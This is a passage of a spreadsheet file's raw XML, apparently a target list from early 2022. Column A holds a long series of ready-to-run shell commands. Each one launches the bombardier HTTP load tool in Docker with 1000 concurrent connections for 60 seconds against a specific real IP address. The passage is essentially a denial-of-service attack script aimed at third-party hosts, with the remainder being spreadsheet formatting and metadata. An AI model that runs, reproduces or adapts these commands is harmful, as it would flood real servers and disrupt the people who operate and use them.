      <c r="B550" s="1" t="s">
        <v>246</v>
      </c>
      <c r="C550" s="1" t="s">
        <v>240</v>
      </c>
    </row>
    <row r="551" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A551" s="1" t="str">
        <f t="shared" si="5"/>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 195.161.62.100&amp;&amp; sleep 5;</v>
      </c>
      <c r="B551" s="1" t="s">
        <v>247</v>
      </c>
      <c r="C551" s="1" t="s">
        <v>247</v>
      </c>
    </row>
    <row r="552" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A552" s="1" t="str">
        <f t="shared" si="5"/>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 188.225.40.162&amp;&amp; sleep 5;</v>
      </c>
      <c r="B552" s="1" t="s">
        <v>248</v>
      </c>
      <c r="C552" s="1" t="s">
        <v>26</v>
      </c>
    </row>
    <row r="553" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A553" s="1" t="str">
        <f t="shared" si="5"/>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 185.32.57.184&amp;&amp; sleep 5;</v>
      </c>
      <c r="B553" s="1" t="s">
        <v>249</v>
      </c>
      <c r="C553" s="1" t="s">
        <v>249</v>
      </c>
    </row>
    <row r="554" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A554" s="1" t="str">
        <f t="shared" si="5"/>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 176.99.13.12&amp;&amp; sleep 5;</v>
      </c>
      <c r="B554" s="1" t="s">
        <v>250</v>
      </c>
      <c r="C554" s="1" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="555" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A555" s="1" t="str">
        <f t="shared" si="5"/>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 176.99.13.11&amp;&amp; sleep 5;</v>
      </c>
      <c r="B555" s="1" t="s">
        <v>251</v>
      </c>
      <c r="C555" s="1" t="s">
        <v>9</v>
      </c>
    </row>
    <row r="556" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A556" s="1" t="str">
        <f t="shared" si="5"/>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 152.32.128.152&amp;&amp; sleep 5;</v>
      </c>
      <c r="B556" s="1" t="s">
        <v>252</v>
      </c>
      <c r="C556" s="1" t="s">
        <v>252</v>
      </c>
    </row>
    <row r="557" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A557" s="1" t="str">
        <f t="shared" si="5"/>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 144.76.167.14&amp;&amp; sleep 5;</v>
      </c>
      <c r="B557" s="1" t="s">
        <v>253</v>
      </c>
      <c r="C557" s="1" t="s">
        <v>254</v>
      </c>
    </row>
    <row r="558" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A558" s="1" t="str">
        <f t="shared" si="5"/>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 94.251.82.138&amp;&amp; sleep 5;</v>
      </c>
      <c r="B558" s="1" t="s">
        <v>255</v>
      </c>
      <c r="C558" s="1" t="s">
        <v>256</v>
      </c>
    </row>
    <row r="559" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A559" s="1" t="str">
        <f t="shared" si="5"/>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.226.31.57&amp;&amp; sleep 5;</v>
      </c>
      <c r="B559" s="1" t="s">
        <v>257</v>
      </c>
      <c r="C559" s="1" t="s">
        <v>257</v>
      </c>
    </row>
    <row r="560" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A560" s="1" t="str">
        <f t="shared" si="5"/>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 91.189.114.24&amp;&amp; sleep 5;</v>
      </c>
      <c r="B560" s="1" t="s">
        <v>259</v>
      </c>
      <c r="C560" s="1" t="s">
        <v>7</v>
      </c>
    </row>
    <row r="561" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A561" s="1" t="str">
        <f t="shared" si="5"/>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 90.156.201.109&amp;&amp; sleep 5;</v>
      </c>
      <c r="B561" s="1" t="s">
        <v>262</v>
      </c>
      <c r="C561" s="1" t="s">
        <v>28</v>
      </c>
    </row>
    <row r="562" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A562" s="1" t="str">
        <f t="shared" si="5"/>
        <v>sudo docker run -it alpine/bombardier -c 1000 -d 60s -l 31.148.96.132&amp;&amp; sleep 5;</v>
      </c>
      <c r="B562" s="1" t="s">
        <v>263</v>
      </c>
      <c r="C562" s="1" t="s">
        <v>263</v>
      </c>
    </row>
    <row r="563" spans="1:3" x14ac:dyDescent="0.25">
      <c r="A563" s="1" t="s">
        <v>1</v>
      </c>
      <c r="B563" s="1"/>
      <c r="C563" s="1"/>
    </row>
  </sheetData>
  <conditionalFormatting sqref="B820:B1048576 B1">
    <cfRule type="duplicateValues" dxfId="16" priority="128"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="B820:B1048576">
    <cfRule type="duplicateValues" dxfId="15" priority="42"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="B814">
    <cfRule type="duplicateValues" dxfId="14" priority="26"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="B814">
    <cfRule type="duplicateValues" dxfId="13" priority="25"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="B814">
    <cfRule type="duplicateValues" dxfId="12" priority="24"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="B820:B1048576 B1 B814">
    <cfRule type="duplicateValues" dxfId="11" priority="22"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="B814">
    <cfRule type="duplicateValues" dxfId="10" priority="160"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="B814:B1048576 B1">
    <cfRule type="duplicateValues" dxfId="9" priority="9"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="B2">
    <cfRule type="duplicateValues" dxfId="3" priority="2"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="B2">
    <cfRule type="duplicateValues" dxfId="2" priority="3"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="B2">
    <cfRule type="duplicateValues" dxfId="1" priority="4"/>
  </conditionalFormatting>
  <conditionalFormatting sqref="B4:B56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Вад</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-02-26T20:00:24Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-03-18T20:17:36Z</dcterms:modified>
</cp:coreProperties>
</file>